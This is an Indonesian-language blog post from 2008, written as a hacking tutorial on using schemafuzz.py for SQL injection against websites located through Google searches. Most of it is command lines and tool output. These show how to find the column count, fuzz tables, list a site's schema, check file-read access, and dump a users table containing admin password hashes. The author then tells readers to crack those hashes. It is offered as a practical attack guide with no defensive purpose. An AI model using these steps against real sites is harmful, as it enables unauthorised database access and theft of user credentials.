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Posted: Jumat, 19 Desember 2008 by QIWS in Label:

Udh lma Gw ga post lg, kali ini Gw mu ngjlasin caranya hack dengan Schemafuzz.py ahh. Tutor ni Gw peruntukan tuk shbt Gw yang pingin bgt bljr hacking, ok sob ni buat loe. Langsung aza dec .
Schemafuzz.py dibuat dengan menggunakan bahasa python Oleh siapa Gw lupa lagi sory, tapi kalo penasaran cari aja di Paman Google pasti ada. Fungsi dari Schemafuzz.py adalah memudahkan menemukan tabel dan kolom pada database sql
Supaya ga lama Gw kasih liat contonya aza dec … Liat baek-baek yah :
pertama-tama kita mari kita panjatkan puji dan syukur ke hadirat allah swt jaelah gayanya kaya yg mau pidato aja ….. just kidding. Ok pertama cari target dengan google, misalkan ditemukan:

sebelum kita melangkah lebih lanjut perlu kita ketahui apa saja perintah yang harus digunakan.
caranya seperti ini ./schemafuzz.py -h help Trus kita temukan sebagian perintahnya seperti ini
--schema, --dbs, --dump, --fuzz, --info, --full, --findcol
langkah pertama
./schemafuzz.py -u "" --findcol
diperoleh seperti ini
[+] URL:
[+] Evasion Used: "+" "--"
[+] 01:32:04
[+] Proxy Not Given
[+] Attempting To find the number of columns...
[+] Testing: 0,1,2,3,4,5,
[+] Column Length is: 6
[+] Found null column at column #: 1
[+] SQLi URL:,1,2,3,4,5--
[+] darkc0de URL:,darkc0de,2,3,4,5
[-] Done!

langkah kedua
setelah ketemu kita masukkan copy yang darkc0de URL jadi seperti ini

./schemafuzz.py -u ",darkc0de,2,3,4,5" --fuzz
diperoleh seperti ini
[+] URL:,darkc0de,2,3,4,5--
[+] Evasion Used: "+" "--"
[+] 01:37:09
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: webthings
User: testing@localhost
Version: 5.0.51a
[+] Number of tables names to be fuzzed: 354
[+] Number of column names to be fuzzed: 263
[+] Searching for tables and columns...

[+] Found a table called: mysql.user

[+] Now searching for columns inside table "mysql.user"
[!] Found a column called:user
[!] Found a column called:password
[-] Done searching inside table "mysql.user" for columns!

[-] [01:37:48]
[-] Total URL Requests 618
[-] Done

langkah ketiga
Setelah kita temukan nama databasenya trus kita lanjutkan kelangkah berikutnya

./schemafuzz.py -u ",darkc0de,2,3,4,5" --schema -D namadatabasenya
./schemafuzz.py -u ",darkc0de,2,3,4,5" --schema -D webthings

[+] URL:,darkc0de,2,3,4,5--
[+] Evasion Used: "+" "--"
[+] 01:43:11
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: webthings
User: testing@localhost
Version: 5.0.51a
[+] Showing Tables & Columns from database "webthings"
[+] Number of Tables: 33

[Database]: webthings
[Table: Columns]
[0]wt_articles: cod,article_id,subtitle,page,text,text_ori,htmlarticle,views
[1]wt_articles_title: article_id,category,title,active,date,userid,views
[2]wt_articlescat: cod,category
[3]wt_banners: cod,name,active,image,url_image,url,code,views,clicks,periode,start_date,end_date
[4]wt_banners_log: banner,date,views,clicks,sessions
[5]wt_banners_rawlog: banner,type,date,session
[6]wt_centerboxes: cod,pos,active,oneverypage,menuoption,title,content,file,type,draw_box
[7]wt_comments: cod,type,link,date,userid,comment
[8]wt_config: id,config
[9]wt_downloads: id,category,name,active,url,date,size,count,rate_sum,rate_count,short_description,description,small_picture,big_picture,author_name,author_email,comments,url_screenshot,license,license_text
[10]wt_downloadscat: cod,ref,name,descr
[11]wt_faq: cod,topic,uid,active,question_ori,question,answer_ori,answer
[12]wt_faq_topics: cod,name
[13]wt_forum_log_topics: uid,msgid,logtime,notifysent
[14]wt_forum_msgs: cod,forum,msg_ref,date,userid,title,text_ori,date_der,views,closed,sticky,modifiedtime,modifiedname,notifies
[15]wt_forums: cod,title,descr,locked,notifies,register
[16]wt_forums_mod: forum,userid,type
[17]wt_guestbook: id,datum,naam,email,homepage,plaats,tekst
[18]wt_links: id,category,active,name,url,count,descr,obs
[19]wt_linkscat: cod,name,descr,parent_id
[20]wt_menu: id,pos,title,url,type,newwindow,lang
[21]wt_news: cod,lang,category,catimgpos,date,title,userid,image,align,active,counter,text,text_ori,full_text,full_text_ori,archived,sidebox,sideboxtitle,sideboxpos
[22]wt_newscat: cod,name,image
[23]wt_online: id,time,uid
[24]wt_picofday: id,category,userid,small_picture,big_picture,description,full_description,views,clicks
[25]wt_picofdaycat: id,name,description
[26]wt_picofdaysel: date,picture_id,views,clicks
[27]wt_polls: cod,dtstart,dtend,question,item01,item02,item03,item04,item05,item06,item07,item08,item09,item10,count01,count02,count03,count04,count05,count06,count07,count08,count09,count10
[28]wt_sideboxes: cod,pos,side,active,title,content,file,type,function,modules
[29]wt_user_access: userid,module
[30]wt_user_book: userid,cod_user
[31]wt_user_msgs: cod,userid,folder,date,user_from,title,msg_read,text,notify
[32]wt_users: uid,name,password,class,realname,email,question1,question2,url,receivenews,receiverel,country,city,state,icq,aim,sex,session,active,comments,

[-] [01:43:48]
[-] Total URL Requests 270
[-] Done

untuk mengetahui apakah kita bisa load_file dalam site tersebut gunakan perintah ini

./schemafuzz.py -u ",darkc0de,2,3,4,5" --info
maka akan tampil seperti ini

[+] URL:,darkc0de,2,3,4,5--
[+] Evasion Used: "+" "--"
[+] 01:46:51
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: webthings
User: testing@localhost
Version: 5.0.51a

[+] Do we have Access to MySQL Database: Yes <-- w00t w00t

[+] Do we have Access to Load_File: No

[-] [01:46:51]
[-] Total URL Requests 3
[-] Done

ternyata kita gak bisa load_file tapi bisa mengakses ke database mysqlnya hehehe

untuk mengetahui beberapa database yang terdapat pada site tersebut, kita gunakan perintah seperti ini

./schemafuzz.py -u ",darkc0de,2,3,4,5" --dbs
akan tampil seperti ini

[+] URL:,darkc0de,2,3,4,5--
[+] Evasion Used: "+" "--"
[+] 01:58:15
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: webthings
User: testing@localhost
Version: 5.0.51a
[+] Showing all databases current user has access too!
[+] Number of Databases: 1

[0] webthings

[-] [01:58:17]
[-] Total URL Requests 30
[-] Done

langkah selanjutnya

cara untuk menemukan user dan password
kita gunakan perintah --dump -D namadatabase -T namatabel -C namakolom
setelah kita menemukan nama database, nama tabel dan kolom tinggal kita masukkan perintah seperti ini
./schemafuzz.py -u ",darkc0de,2,3,4,5" --dump -D webthing -T wt_users -C name,password

eing ing eng....
jreennnng....keluar deh user ama passwordnya
hasilnya dibawah ini

[+] URL:,darkc0de,2,3,4,5--
[+] Evasion Used: "+" "--"
[+] 02:08:47
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: webthings
User: testing@localhost
Version: 5.0.51a
[+] Dumping data from database "webthings" Table "wt_users"
[+] Column(s) ['name', 'password']
[+] Number of Rows: 2

[0] admin:e00b29d5b34c3f78df09d45921c9ec47:
[1] user:098f6bcd4621d373cade4e832627b4f6:

[-] [02:08:48]
[-] Total URL Requests 4
[-] Done

jangan lupa kita selalu mengecek schemafuzzlog.txt nya
setelah itu tinggal kita meng crack passwordnya pake program
gemana rekan2 gampang kan pake schemafuzz
Catatan :
Langkah diatas sangat mudah digunakan pada MySQL v5 kalau untuk MySQL versi 4 silakan menebak2 tabel ama kolomnya

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